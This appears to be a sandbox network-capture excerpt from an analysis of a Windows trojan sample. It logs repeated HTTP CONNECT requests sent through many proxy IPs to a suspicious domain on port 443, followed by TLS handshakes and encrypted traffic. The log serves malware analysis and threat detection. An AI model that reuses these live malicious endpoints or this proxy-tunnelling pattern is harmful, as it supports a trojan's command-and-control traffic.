                                                                                381192.168.2.85122816.163.88.228805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.517034054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.841936111 CET668INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.16.1
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 494
                                                                                Connection: close
                                                                                ETag: "5d52d17f-1ee"
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 65 72 72 6f 72 20 6c 6f 67 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe error log for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                382192.168.2.850835179.43.8.1680885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.524118900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.695029020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.695329905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                383192.168.2.850680202.8.74.1080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.524374962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.317924023 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                384192.168.2.8512061.10.255.280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.529541969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.891779900 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                385192.168.2.851463152.32.132.2204435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.537653923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                386192.168.2.851465152.32.132.2204435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.542783022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                387192.168.2.851226119.93.148.19180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.545867920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352828979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.081284046 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                388192.168.2.851085192.111.139.163194045828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.547410965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                389192.168.2.851422184.181.217.22041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.548959970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                390192.168.2.851230210.211.113.34805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.553009033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.985598087 CET194INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Proxy-Connection: close
                                                                                Via: http/1.1 edgep-06.infra.viettelcdn.com (0.fd8fb8633.el8 [uSc s f p eN:tMc p s ])
                                                                                Server: 0.fd8fb8633.el8
                                                                                Feb 23, 2024 14:28:24.986347914 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 9d 78 f9 96 f9 e0 af c2 ca a9 06 ee 2e d9 16 30 66 d0 e6 11 f8 96 af 3e 11 f0 7b 49 48 33 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ex.0f>{IH3*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                Feb 23, 2024 14:28:25.417732954 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 9d 79 95 1f db ab 19 fc 49 3e 3e eb a3 2a b2 80 ed 93 14 be ab 1d 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                Data Ascii: C?eyI>>*DOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                Feb 23, 2024 14:28:25.417756081 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                Feb 23, 2024 14:28:25.417870998 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                Feb 23, 2024 14:28:25.417902946 CET832INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                Feb 23, 2024 14:28:25.422136068 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 6a e6 e5 11 67 d7 e2 2a f6 58 ba df c3 71 08 a8 35 b5 b5 c0 34 07 09 6e c2 95 42 d5 0f fd 64 66 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 33 68 54 5d 93 c7 ff 74 cc 2c 13 04 38 2c 0e 27 ec a6 05 b2 e3
                                                                                Data Ascii: %! jg*Xq54nBdf(3hT]t,8,'7&Dwi3Y2
                                                                                Feb 23, 2024 14:28:25.846204996 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 2c d5 f9 b2 cc 79 2d dc cb 42 44 aa c9 0d 08 f5 3a 3a ee 59 8b 7c ea 8e aa 75 41 d7 99 86 fb 84 95 53 a0 d1 f0 e8 64 7b 67 5a 4f 0f 73 fb 9c e3 2f 78 86 4c 26 f1 bb 95 44 fe f7 88 55 69 f3 09 ec fc 8e
                                                                                Data Ascii: ,y-BD::Y|uASd{gZOs/xL&DUi0nAM4*)0Pd{3~=MEo+nr(|qZs7@Hn6XGlMxF,pLLQWs\F^(:(P+WJZ$`
                                                                                Feb 23, 2024 14:28:25.853353977 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 8d 8b 39 aa 3e e1 ea bb 19 81 35 7e 22 7e 4e bc 1b 6e 04 80 db 14 1d dd a6 91 a7 65 73 83 78 8b 2d 7f ff 60 8a d6 a3 67 09 02 4d a7 ce ed 4d 24 9e c8 aa a1 b3 bd 95 ca 76 cf 93 23 44 ac 3c b7 e5 f6 a5 2d e1
                                                                                Data Ascii: 9>5~"~Nnesx-`gMM$v#D<-L|hB?W6C17Z\+:V L
                                                                                Feb 23, 2024 14:28:26.525578976 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 f8 05 04 9c de 11 e8 e6 96 cd b3 4b dc 6b 96 c0 97 20 6c ca 79 c7 5a 1f 7a bb 88 e0 4c 10 2d 95 79 fd ec e0 f0 45 1e 84 aa f7 18 d3 cd 56 03 5b 1c bd 9a ec af 29 aa 7c 7c 35 62 2b 53 68 30 f6 28 a9 cf e4 0a
                                                                                Data Ascii: qKk lyZzL-yEV[)||5b+Sh0(eY7EiI,4d}Cl483f8\Rdbs%%vElX=U;w'?-o!v;^'(g|;&@*yKP\(pXDXP%RX
                                                                                Feb 23, 2024 14:28:26.525764942 CET1286INData Raw: 6d d6 5d e0 b5 b0 60 54 f1 b2 dc 23 d1 fe 7a 23 77 da 80 28 42 01 91 61 b1 f9 a7 d3 8b cd e0 68 78 2b 0e 52 d2 6b 8a 54 35 73 8e 62 3d 8a 4e 68 2d 2f f5 8d 12 5f 47 66 23 b5 e1 62 06 73 61 d2 a9 1d e4 4f 68 10 05 31 06 e3 fe 76 98 58 7b 10 ff 66
                                                                                Data Ascii: m]`T#z#w(Bahx+RkT5sb=Nh-/_Gf#bsaOh1vX{fT,]vLbqbK)|#5+Uz`+24=6HtN#A0T"a$#{d>/lf|<=:VOz'>vM~a4%X


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                391192.168.2.85127343.131.245.216156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.557128906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                392192.168.2.851470152.32.132.2204435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.560010910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                393192.168.2.851471152.32.132.2204435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.561393023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                394192.168.2.850698103.29.90.66326505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.587038994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.988562107 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                395192.168.2.851306115.74.158.4010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.598921061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                396192.168.2.851251103.127.1.130805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.602324009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                397192.168.2.850914148.72.177.90649475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.603605032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                398192.168.2.85088872.195.34.60273915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.604027987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                399192.168.2.851320116.199.170.1741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.609725952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                400192.168.2.851326115.77.148.25320195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.611319065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.986414909 CET228INHTTP/1.0 502 Bad Gateway
                                                                                Connection: close
                                                                                Content-type: text/html; charset=utf-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                401192.168.2.85088472.195.114.18441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.620400906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                402192.168.2.8508284.144.136.15805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.628782988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.730112076 CET59INHTTP/1.1 200 Connection Established
                                                                                Proxy-agent: nginx
                                                                                Feb 23, 2024 14:28:29.755532980 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 7c 62 41 a3 d5 5d e8 55 56 01 65 2c d7 bb 9c f0 29 18 74 27 17 09 b4 bb 9d dc 35 5c aa 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: e|bA]UVe,)t'5\*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#,y-BDfg)SzbS
                                                                                Feb 23, 2024 14:28:33.246475935 CET115INData Raw: 16 03 03 00 3b 02 00 00 37 03 03 65 d8 9d 7f 80 5e 33 42 7f 5b 11 7b b1 44 7e ef 16 d4 d6 da 41 95 7a d8 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0f 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00
                                                                                Data Ascii: ;7e^3B[{D~AzDOWNGRD/(kf,df'9 VeDAx
                                                                                Feb 23, 2024 14:28:33.250310898 CET198OUTData Raw: 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 90 87 d2 1b 20 03 1b 10 0a cf 34 28 20 bb 92 65 56 15 27 ed 57 8e ec eb 71 1a 27 b2 e4 8a 1c da 17 03 03 00 8e 00 00 00 00 00 00 00 01 ae 7a 46 bd 4e 21 7b 1f 16 cd 9d 78 a8 83 c6 25 3b 6f
                                                                                Data Ascii: ( 4( eV'Wq'zFN!{x%;o$5v,ouF_[}4\eV$YZTd?)qC9;tl>S8WJMN]s[m4=:O'|v=x`d!'a
                                                                                Feb 23, 2024 14:28:34.767781019 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 22 b9 dd 75 61 3b e4 da 32 25 b5 4a 2f 95 ed 13 a9 fe 11 69 0e 2e 1b 00 7e ae b7 20 3e 77 d7 b2 73 35 e8 e5 5f 05 86 8a 4e f0 90 ca 4b de aa e0 1e b5 2b 5e 44 92 22 0b 2e cc a9 e1 90 da 88 d2 cc 16 fa 54 f4
                                                                                Data Ascii: q"ua;2%J/i.~ >ws5_NK+^D".TH1c{XdZOHQ_)q+Banu{s;PefldK>:(nxva&EHs|uuG<9n,G2]PVc!Y6zslQcgb
                                                                                Feb 23, 2024 14:28:34.767832041 CET1286INData Raw: b6 75 d1 22 d5 62 74 e7 d8 bb a1 96 0d 9b 08 b6 01 79 07 12 69 df f5 32 16 b3 fe ed d1 40 df 22 2f 07 54 ee ba ca 72 18 ee 95 6e fb 3f e2 26 d3 a0 97 d3 97 91 e3 cb a8 1a 60 4c da c7 0e f7 c0 18 a1 70 48 91 01 a9 32 09 0b b1 77 dc 44 86 8d a2 08
                                                                                Data Ascii: u"btyi2@"/Trn?&`LpH2wDS&(3?1}<p]4@Wi11fl0|hbBZS24d^\7R^Nepx|-K0X7SWB%>w1ZUV
                                                                                Feb 23, 2024 14:28:34.767842054 CET1286INData Raw: bf 90 63 ce 57 f6 2a 19 04 2d e3 f8 5e 55 f6 14 91 23 99 c8 21 41 0e 10 f5 9b 3a a7 59 d2 67 8e 6d 46 64 a8 db b2 03 12 09 56 53 67 73 cf 16 46 5f 56 49 7f 4a 75 fa 0e 74 ce 58 f0 1c 29 03 ac c9 de 3a 01 22 50 97 10 73 ba cd c3 40 c9 32 9f af 74
                                                                                Data Ascii: cW*-^U#!A:YgmFdVSgsF_VIJutX):"Ps@2t*~m%PW7]z.p4+(*ZD: ?S%m@Js>)W[f/15]o9fpZx+vFjP#]d-Gy=Ii`YD:
                                                                                Feb 23, 2024 14:28:34.767849922 CET1286INData Raw: 88 de 1d b4 59 64 8d f2 30 84 bc 74 ad aa 3b a2 54 05 a4 83 6b 00 76 eb 2e b6 77 1a bc 24 b0 e7 e1 f6 14 38 ff bf 4f 30 73 c6 10 a0 c4 03 5d 97 6b c2 cf 38 d9 35 28 71 a1 dc 06 89 82 98 95 bd 39 1d a8 75 6e b2 7f f3 cb ee 7e c9 0f 92 77 22 0a c4
                                                                                Data Ascii: Yd0t;Tkv.w$8O0s]k85(q9un~w"MQ}0ZjS$Cv?wv[CM)2vH`*H&"#{:mGO^=r:k$}x[T(GQxXf8tz7-:?mm
                                                                                Feb 23, 2024 14:28:34.767906904 CET496INData Raw: a0 11 86 27 fe b9 47 c6 79 3c 35 c1 e1 6b 37 b3 b3 86 8d 79 94 85 e3 bd 2e 83 ef 64 b0 ce 84 1c 44 3e 35 9c 18 2c 2b 36 78 a8 01 33 75 7b dc 31 87 ca 1a 90 6f 05 e1 ae d5 91 4c 27 68 28 37 36 7d 01 8b b5 0a 4a 24 60 07 ca f0 ca e4 aa d6 a2 37 c6
                                                                                Data Ascii: 'Gy<5k7y.dD>5,+6x3u{1oL'h(76}J$`7k:X[.4@fwY-~Xj'fO5B9e[E3!Zf5LK6UrUvsG|J1K`KX9F=AZ*d_,'J}M^
                                                                                Feb 23, 2024 14:28:34.767915964 CET1286INData Raw: c4 c7 78 72 74 aa fb a6 2f 52 a5 cf e1 2c 82 77 e1 7d f0 9b 2d 98 24 14 bf 9c 09 d0 ed 41 5a f2 73 5a 5c d9 e2 3c 10 cd 89 8d 88 b8 aa 3b 93 ca 00 21 d1 b0 cc 8b a5 6a 64 f5 94 65 87 3e 32 6e a7 3a 3e 9f b0 b2 2b b6 26 8b 38 51 80 0e 18 f2 44 06
                                                                                Data Ascii: xrt/R,w}-$AZsZ\<;!jde>2n:>+&8QD/9;'jWIp&$61._.R7qj.luN|GrK@5x2Fyk"Tkg8xBy_>@!-L=Wk>/1m1z)*'#2$;P@
                                                                                Feb 23, 2024 14:28:34.767954111 CET1286INData Raw: 18 2d 8a f7 5b 5b c1 85 e0 98 55 66 30 99 df 05 3b de c0 5b f4 1b bc 4d 10 69 79 6f cc b1 1a e9 e9 78 1f f7 59 93 8b 15 ab 82 0b 9a b9 14 f5 ca b0 2b 55 0b 3a 0f b9 16 80 72 22 b5 64 bb bf f6 63 f6 6d 2d 1c 75 99 db 97 02 6c f2 97 28 02 24 9a 0f
                                                                                Data Ascii: -[[Uf0;[MiyoxY+U:r"dcm-ul($}j:>?]p~,GH(l tY^;p8$S][4Q^>pX~<<7LcBLtF+&uRKGuq|>`1^*tzwq%oq


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                403192.168.2.851337172.232.111.247805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.628931999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.351108074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.669559002 CET739INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Server: case1
                                                                                X-Frame-Options: SAMEORIGIN
